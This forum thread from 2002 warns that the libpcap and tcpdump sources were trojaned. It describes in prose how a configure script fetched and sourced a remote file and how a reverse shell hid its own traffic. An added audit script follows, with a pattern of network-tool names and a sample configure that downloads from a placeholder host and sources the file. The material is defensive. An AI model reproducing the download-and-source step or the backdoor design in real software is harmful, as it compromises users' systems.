
#1 2002-11-13 13:18:47

jk
Member
From: Groningen, The Netherlands
Registered: 2002-10-24
Posts: 66
Website

ATTN: Latest libpcap & tcpdump sources contain a trojan

The URLs used in the abs files both refer to trojaned sources. It seems not to affect built binaries, thus installing using pacman is not a problem.

Details:

    * The trojan contains modifications to the configure script and gencode.c (in libpcap only).

    * The configure script downloads http://mars.raketti.net/~mash/services which is then sourced with the shell. It contains an embedded shell script that creates a C file, and compiles it.

    * The program connects to 212.146.0.34 (mars.raketti.net) on port 1963 and reads one of three one-byte status codes:
          o A - program exits
          o D - forks and spawns a shell and does the needed file descriptor manipulation to redirect it to the existing connection to 212.146.0.34.
          o M - closes connection, sleeps 3600 seconds, and then reconnects

      Hmm... ADM...

    * It's important to note that it reuses the same outgoing connection for the shell. This gets around firewalls that block incoming connections.

    * Gencode.c is modified to force libpcap to ignore packets to/from the backdoor program, hiding the backdoor program's traffic.

    * This is similar to the OpenSSH trojan a few months ago.

Check http://hlug.fscker.com/ for more information

Offline
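An added example, not part of the original post: a heuristic audit that flags build scripts in an unpacked source tree which invoke a network client, the behaviour the post describes in the trojaned configure script. The function names and the sample trees (with the host `example.invalid`) are constructed for illustration; a clean result does not prove a tarball is untampered, so upstream checksums or signatures still need to be compared.

```shell
#!/bin/sh
# Commands that reach the network. A generated autoconf configure script
# has no reason to run any of them (heuristic list, an assumption).
NET_RE='(^|[;&|(`[:space:]])(wget|curl|lynx|telnet)[[:space:]]|/dev/tcp/'

# audit_build_scripts DIR
# Prints "file:line:text" for every non-comment line in a build script that
# invokes a network client. Returns 1 if anything was flagged, 0 if clean.
audit_build_scripts() {
    dir=$1
    hits=$(find "$dir" -type f \( -name configure -o -name 'configure.*' \
                -o -name 'Makefile*' -o -name '*.sh' \) \
                -exec grep -nE "$NET_RE" /dev/null {} + 2>/dev/null |
           grep -vE '^[^:]*:[0-9]+:[[:space:]]*#' || true)
    if [ -z "$hits" ]; then
        return 0
    fi
    printf '%s\n' "$hits"
    return 1
}

# make_samples DIR
# Builds two constructed trees: one harmless, one whose configure script
# downloads a file and sources it, as described in the post.
make_samples() {
    mkdir -p "$1/clean" "$1/tampered"
    printf '%s\n' '#!/bin/sh' '# wget is only mentioned in this comment' \
        'echo "checking for gcc... yes"' > "$1/clean/configure"
    printf '%s\n' '#!/bin/sh' 'echo "checking for gcc... yes"' \
        'wget -q -O conftest.inc http://example.invalid/services' \
        '. ./conftest.inc' > "$1/tampered/configure"
}

# Demo on the constructed trees.
tmp=$(mktemp -d)
make_samples "$tmp"
audit_build_scripts "$tmp/clean" && echo "clean tree: nothing flagged"
audit_build_scripts "$tmp/tampered" || echo "tampered tree: review before building"
rm -rf "$tmp"
```

Run it against the extracted source directory before `./configure`; any hit is a reason to stop and compare the tarball with a copy from a trusted mirror.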

#2 2002-11-13 18:01:24

Arielext
Member
From: Amersfoort, the Netherlands
Registered: 2002-08-12
Posts: 362
Website

Re: ATTN: Latest libpcap & tcpdump sources contain a trojan

thank somebody I can't use abs at school :)
Think they would be very upset if I introduce yet another virus ...


apt-get install arch

Offline
